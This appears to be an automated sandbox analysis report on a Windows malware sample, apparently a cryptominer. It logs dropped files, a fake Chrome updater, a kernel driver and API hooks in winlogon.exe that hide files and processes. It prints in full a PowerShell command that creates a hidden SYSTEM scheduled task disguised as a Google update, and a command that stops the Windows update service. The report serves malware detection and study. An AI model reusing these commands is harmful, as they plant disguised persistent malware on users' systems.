Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll
Source: C:\Windows\System32\choice.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: dxgi.dll

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: zufmUwylvo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zufmUwylvo.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }			Jump to behavior

Source: zufmUwylvo.exe

Static PE information: 0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: ..>f

Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .xdata
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .yuZ
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .e;T
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ."Ki
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ..>f
Source: updater.exe.1.dr	Static PE information: section name: .xdata
Source: updater.exe.1.dr	Static PE information: section name: .yuZ
Source: updater.exe.1.dr	Static PE information: section name: .e;T
Source: updater.exe.1.dr	Static PE information: section name: ."Ki
Source: updater.exe.1.dr	Static PE information: section name: ..>f
Source: jscseoeoqftm.tmp.37.dr	Static PE information: section name: _RANDOMX
Source: jscseoeoqftm.tmp.37.dr	Static PE information: section name: _TEXT_CN
Source: jscseoeoqftm.tmp.37.dr	Static PE information: section name: _TEXT_CN
Source: jscseoeoqftm.tmp.37.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36D22B8 push rdx; retf	0_2_00000125D36D22B9
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36D84FD push rcx; retf 003Fh	0_2_00000125D36D84FE
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A54F950 push cs; ret	0_2_00007FF95A5501AF
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A5501B0 push cs; ret	0_2_00007FF95A5501AF
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A54F93D push cs; ret	0_2_00007FF95A5501AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF95A41D2A5 pushad ; iretd	21_2_00007FF95A41D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF95A537B8B push eax; ret	21_2_00007FF95A537B99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF95A6055B4 push ecx; iretd	21_2_00007FF95A60560C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C84884FD push rcx; retf 003Fh	24_2_000001F6C84884FE
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C84822B8 push rdx; retf	24_2_000001F6C84822B9
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88B94FD push rcx; retf 003Fh	24_2_000001F6C88B94FE
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88E84FD push rcx; retf 003Fh	24_2_000001F6C88E84FE
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88E22B8 push rdx; retf	24_2_000001F6C88E22B9
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C89194FD push rcx; retf 003Fh	24_2_000001F6C89194FE
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8E22B8 push rdx; retf	27_2_00000261AC8E22B9
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8E84FD push rcx; retf 003Fh	27_2_00000261AC8E84FE
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC9194FD push rcx; retf 003Fh	27_2_00000261AC9194FE
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275F22B8 push rdx; retf	28_2_000001F0275F22B9
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275F84FD push rcx; retf 003Fh	28_2_000001F0275F84FE
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0276294FD push rcx; retf 003Fh	28_2_000001F0276294FE
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3E22B8 push rdx; retf	29_2_000002311E3E22B9
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3E84FD push rcx; retf 003Fh	29_2_000002311E3E84FE
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E4194FD push rcx; retf 003Fh	29_2_000002311E4194FE
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E4422B8 push rdx; retf	29_2_000002311E4422B9
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E4484FD push rcx; retf 003Fh	29_2_000002311E4484FE

Source: zufmUwylvo.exe, ekICtOIWXJ.cs	High entropy of concatenated method names: 'swabLfmNIaglcePbRGW', 'tcLsoRlnFyRfwI', 'NFFLQeUbbxzgYdnqPAtlPlhm', 'uzIJJBoTjCWMvGlYAkupkNJR', 'BeDWfcXSRVeM', 'RwLMobReUuINOAm', 'JhqqBHWkxEaytdkGLiSydYYhA', 'hkvIQblVIooVQKaaPkB', 'krJBCfioTlIIqXa', 'ponyNYUvRpSHXDIoghspa'
Source: zufmUwylvo.exe, roSrfIIxQdQfrmEdXbvoNPsM.cs	High entropy of concatenated method names: 'XcyJWwHAMPWCwOgGMEFhlAo', 'fOJnXobOeWdJNrQeaje', 'fulhNOrQWCGXnT', 'HmUcYnHXZkWsVnbGCWb', 'kccZJxKscPFVtMIrGGFZYWLwq', 'WcuvEBMUteKuSbdP', 'KfByIfjAvQBbORfjnahxgLEJ', 'TdgLnewIbBRpWOxLv', 'kKtfNfLfAvRO', 'arZpCCpIlFSnQNuRMkmlDTzfn'
Source: zufmUwylvo.exe, DiybvPeeTbqiC.cs	High entropy of concatenated method names: 'qBYKDCTiybvbxhcPVVVIt', 'dCgjRneYuZtuJwoIOzsUkXgUR', 'CDFVNtsqYVdTkfEagViDYfbN', 'VQZPGWMSVlaS', 'LzBTYSevOMPJqKmNY', 'bsOrdTaSzRAPueIIK', 'CEHJjLHDJFQMaFxOyaKT', 'hsFTNuzSlBiADKTP', 'JCkZKVCmqvSffhx', 'MVMBpVRIlYEiMWudzfRHjwX'

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	File created: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\Temp\jscseoeoqftm.tmp

Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JSCSEOEOQFTM.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9A 0xA3 0x32 0x2E 0xEF

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Memory written: PID: 6672 base: 7FF9CD790008 value: E9 0B D8 E9 FF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Memory written: PID: 6672 base: 7FF9CD62D810 value: E9 00 28 16 00	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: PID: 8404 base: 7FF9CD790008 value: E9 0B D8 E9 FF
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: PID: 8404 base: 7FF9CD62D810 value: E9 00 28 16 00

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
